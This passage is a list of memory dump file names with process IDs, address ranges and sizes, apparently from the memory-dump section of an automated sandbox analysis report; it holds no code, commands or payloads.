- memory/1520-99-0x0000000001340000-0x0000000001341000-memory.dmp (4KB)
- memory/1520-103-0x0000000000430000-0x0000000000432000-memory.dmp (8KB)
- memory/1520-101-0x000000001B320000-0x000000001B322000-memory.dmp (8KB)
- memory/1568-95-0x0000000000000000-mapping.dmp
- memory/1580-93-0x0000000000000000-mapping.dmp
- memory/1684-78-0x0000000000000000-mapping.dmp
- memory/1712-109-0x0000000000000000-mapping.dmp
- memory/1768-90-0x0000000000000000-mapping.dmp
- memory/1796-143-0x0000000002320000-0x0000000002322000-memory.dmp (8KB)
- memory/1796-121-0x000000013F1B0000-0x000000013F1B1000-memory.dmp (4KB)
- memory/1796-115-0x0000000000000000-mapping.dmp
- memory/1804-94-0x0000000000000000-mapping.dmp
- memory/1836-127-0x0000000000000000-mapping.dmp
- memory/1836-108-0x0000000000000000-mapping.dmp
- memory/1844-107-0x0000000000000000-mapping.dmp
- memory/1932-144-0x000000001B200000-0x000000001B202000-memory.dmp (8KB)
- memory/1932-122-0x000000013F2D0000-0x000000013F2D1000-memory.dmp (4KB)
- memory/1932-116-0x0000000000000000-mapping.dmp
- memory/1940-92-0x0000000000000000-mapping.dmp
- memory/1948-68-0x0000000000000000-mapping.dmp
- memory/1948-111-0x000000001C830000-0x000000001C832000-memory.dmp (8KB)
- memory/1948-105-0x0000000000560000-0x0000000000569000-memory.dmp (36KB)
- memory/1948-74-0x000000013F720000-0x000000013F721000-memory.dmp (4KB)